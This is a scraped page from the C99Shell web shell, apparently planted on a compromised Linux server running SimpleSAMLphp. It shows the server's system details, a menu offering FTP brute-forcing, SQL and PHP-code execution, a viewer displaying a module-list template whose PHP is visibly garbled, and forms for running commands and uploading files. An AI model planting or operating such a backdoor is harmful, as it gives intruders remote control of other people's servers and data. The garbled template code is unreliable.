!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/simplesamlphp/modules/modinfo/templates/   drwxr-xr-x
Free 13.81 GB of 61.93 GB (22.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     modlist.php (2.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$this
->data['header'] = $this->t('{modinfo:modinfo:modlist_header}');
$this->includeAtTemplateBase('includes/header.php');

#$icon_enabled  = '<img src="/' . $this->data['baseurlpath'] . 'resources/icons/silk/accept.png" alt="' .
#htmlspecialchars($this->t(...)" />';
#$icon_disabled = '<img src="/' . $this->data['baseurlpath'] . 'resources/icons/silk/delete.png" alt="disabled" />';

?>

<h2><?php echo($this->data['header']); ?></h2>

<table class="modules" style="width: 100%">
<tr>
<th colspan="2"><?php echo($this->t('{modinfo:modinfo:modlist_name}')); ?></th>
<th ><?php echo($this->t('{modinfo:modinfo:modlist_status}')); ?></th>
<th colspan="2"><?php echo($this->t('{modinfo:modinfo:version}')); ?></th>
</tr>
<?php

$i 
0;
foreach(
$this->data['modules'] as $id => $info) {
    echo(
'<tr class="' . ($i++ % == 'odd' 'even') . '">');
    
    
    if (isset(
$info['def'])) {
        echo(
'<td><a href="http://simplesamlphp.org/modules/' htmlspecialchars($id) . '">' htmlspecialchars($info['def']->def['name']) . '</a></td>');        
    } else {
        echo(
'<td> </td>');
    }
    
    
    echo(
'<td><tt>' htmlspecialchars($id) . '</tt></td>');
    
    
    if(
$info['enabled']) {
        echo(
'<td><img src="/' $this->data['baseurlpath'] . 'resources/icons/silk/accept.png" alt="' .
            
htmlspecialchars($this->t('{modinfo:modinfo:modlist_enabled}')) . '" /></td>');
    } else {
        echo(
'<td><img src="/' $this->data['baseurlpath'] . 'resources/icons/silk/delete.png" alt="' .
            
htmlspecialchars($this->t('{modinfo:modinfo:modlist_disabled}')) . '" /></td>');
    }
    
    if (isset(
$info['def'])) {
        echo(
'<td>' htmlspecialchars($info['def']->getVersion()) . ' (' .htmlspecialchars($info['def']->getBranch()) . ')</td>');    
        if (
$info['def']->updateExists()) {
            echo(
'<td><img style="display: inline" src="/' $this->data['baseurlpath'] . 'resources/icons/silk/delete.png" alt="' .
                
htmlspecialchars($this->t('{modinfo:modinfo:update_exists}')) . '" /> ' 
                
htmlspecialchars($this->t('{modinfo:modinfo:update_exists}')) . '</td>');        
        } else {
            echo(
'<td><img style="display: inline" src="/' $this->data['baseurlpath'] . 'resources/icons/silk/accept.png" alt="' .
                
htmlspecialchars($this->t('{modinfo:modinfo:latest_version}')) . '" /> ' 
                
htmlspecialchars($this->t('{modinfo:modinfo:latest_version}')) . '</td>');
        }
    } else {
        echo(
'<td colspan="2"> </td>');
    }
    
    echo(
'</tr>');
}
?>
</table>
<?php $this->includeAtTemplateBase('includes/footer.php'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.7815 ]--